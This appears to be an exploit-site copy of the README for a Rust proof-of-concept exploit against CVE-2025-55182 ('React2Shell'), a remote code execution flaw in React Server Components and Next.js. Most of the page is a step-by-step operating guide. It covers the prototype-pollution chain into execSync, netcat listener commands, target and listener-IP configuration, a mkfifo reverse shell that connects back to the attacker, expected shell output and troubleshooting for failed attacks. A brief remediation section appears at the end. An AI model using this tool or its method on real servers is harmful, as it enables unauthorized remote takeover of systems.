## https://sploitus.com/exploit?id=4EB42032-8EFB-5A8B-8102-9BF59278396E
# React2Shell (CVE-2025-55182) PoC
A Proof-of-Concept exploit for **CVE-2025-55182**, also known as **React2Shell** - a critical remote code execution vulnerability in React Server Components.
> โ ๏ธ **EDUCATIONAL USE ONLY**: This tool is for authorized security testing, and learning purposes only. Unauthorized access to computer systems is illegal.
##CVE-2025-55182 is a **critical severity (CVSS 10.0)** server-side prototype pollution vulnerability affecting React Server Components. The vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable servers by sending a single crafted HTTP request.
### Affected Software
- **React** versions 19.x
- **Next.js** versions 15.x and 16.x (with App Router)
- **React Router** and **Waku** frameworks
- Applications using Server Components in default configurations
### Timeline
- **December 3, 2025**: Public disclosure
- **Within hours**: Active exploitation by state-sponsored threat actors
- **Added to CISA KEV catalog** due to widespread exploitation
## How It Works
The exploit leverages **prototype pollution** in React's server-side deserialization logic:
1. **Prototype Pollution**: Injects malicious properties into JavaScript's `__proto__` chain
2. **Code Execution**: Uses `process.mainModule.require('child_process').execSync()` to run commands
3. **Output Exfiltration**: Returns command output as base64-encoded data in HTTP redirect responses
### Technical Flow
```
Attacker โ Malicious POST Request โ React Server Components
โ
Prototype pollution via __proto__
โ
child_process.execSync('command')
โ
Base64 output in NEXT_REDIRECT error
โ
Attacker โ Command output / Reverse shell
```
## Features
- โ **Clean, educational code** with extensive comments
- โ **BSD/macOS compatible** reverse shell (uses mkfifo, not -e flag)
- โ **Easy configuration** via constants at top of file
- โ **Proxy support** for traffic inspection (Burp Suite, etc.)
- โ **Response parsing** to show command output
- โ **Beginner friendly** structure and documentation
## Prerequisites
Before using this tool, you need:
### 1. Rust Toolchain
```bash
# Install Rust (if not already installed)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```
### 2. Netcat Listener
To receive the reverse shell:
```bash
# Start a listener on your machine
nc -lvnp 4444
```
### 3. A Vulnerable Target
You need a test environment with:
- Next.js 15.x or 16.x with App Router enabled
- React Server Components enabled
- Network connectivity between target and your listener IP
# Build the project
cargo build --release
```
## Configuration
Edit `src/main.rs` and modify these constants:
```rust
/// Target server URL (the vulnerable Next.js app)
const TARGET_URL: &str = "http://TARGET_HOST:TARGET_PORT";
/// Your IP address (where reverse shell connects back)
const LISTENER_IP: &str = "YOUR_IP_HERE";
/// Port for your netcat listener
const LISTENER_PORT: &str = "4444";
/// Optional proxy for traffic inspection
const PROXY_URL: Option = Some("http://127.0.0.1:8080");
```
### Example Configuration
```rust
const TARGET_URL: &str = "http://vulnerable-app.local:3000";
const LISTENER_IP: &str = "192.168.1.100";
const LISTENER_PORT: &str = "4444";
const PROXY_URL: Option = None; // Disable proxy
```
## Usage
### Step 1: Start Your Listener
On your attack machine:
```bash
nc -lvnp 4444
```
### Step 2: Run the Exploit
```bash
cargo run --release
```
### Expected Output
```
[*] CVE-2025-55182 (React2Shell) Exploit
[*] Target: http://vulnerable-app.local:3000
[*] Listener: 192.168.1.100:4444
[*] Sending exploit payload...
[+] Response received
[*] Command Output:
(any error messages or output)
[+] Reverse shell may have connected!
[+] Check your listener at 192.168.1.100:4444
```
### Step 3: Check Your Listener
If successful, you'll see a connection in your netcat listener:
```bash
Connection from 192.168.1.50:54321
bash-5.1$
```
## Troubleshooting
### "nc: invalid option -- 'e'"
This means the target uses BSD netcat. The code already handles this with the mkfifo method.
### "Connection refused" or timeout
- Ensure your listener is running: `nc -lvnp 4444`
- Check firewall rules on your machine
- Verify the target can reach your LISTENER_IP
- Confirm network connectivity between systems
### "No redirect found in response"
- Target may not be vulnerable
- Check if React Server Components are enabled
- Verify Next.js version (needs 15.x or 16.x)
- Try inspecting traffic with Burp Suite (enable PROXY_URL)
### Command works but reverse shell doesn't connect
- Network connectivity issues between target and listener
- Firewall blocking outbound connections
- Try testing with simple command first: change `get_reverse_shell_command()` to return `"id"` or `"whoami"`
## Understanding the Code
### Main Components
1. **Configuration** (lines 11-26): Easy-to-modify settings
2. **Payload Builder** (lines 38-43): Creates the prototype pollution payload
3. **Reverse Shell** (lines 49-54): Generates BSD-compatible shell command
4. **Main Exploit** (lines 60-129): Sends request and parses response
### Key Functions
```rust
// Creates the malicious JSON payload
fn build_exploit_payload(command: &str) -> String
// Generates mkfifo-based reverse shell (BSD compatible)
fn get_reverse_shell_command(ip: &str, port: &str) -> String
// Main execution flow
fn main() -> Result>
```
## Setting Up a Test Environment
For educational purposes, you can create a vulnerable test lab:
```bash
# Create a Next.js 15.x app
npx create-next-app@15 vulnerable-app
cd vulnerable-app
# Start the development server
npm run dev
```
**Note**: Always patch production systems! This is for isolated testing only.
## Remediation
If you manage React/Next.js applications:
1. **Update immediately** to patched versions:
- React: Update to latest secure version
- Next.js: Update to patched 15.x/16.x releases
2. **Check for exploitation**:
- Review logs for unusual POST requests with "Next-Action" headers
- Look for execSync/child_process usage in logs
- Check for unauthorized file creation (/tmp/f, etc.)
3. **Network segmentation**:
- Limit outbound connections from web servers
- Monitor for unusual reverse shell traffic
## References
- [Official React Security Advisory](https://react.dev/blog/2025/12/03/react-server-components-security)
- [Datadog Security Labs - CVE-2025-55182](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)
- [React2Shell.com](https://react2shell.com/)
- [Huntress - PeerBlight Analysis](https://www.huntress.com/blog/peerblight-linux-backdoor-exploits-react2shell)
- [AWS - China-nexus Threat Groups](https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/)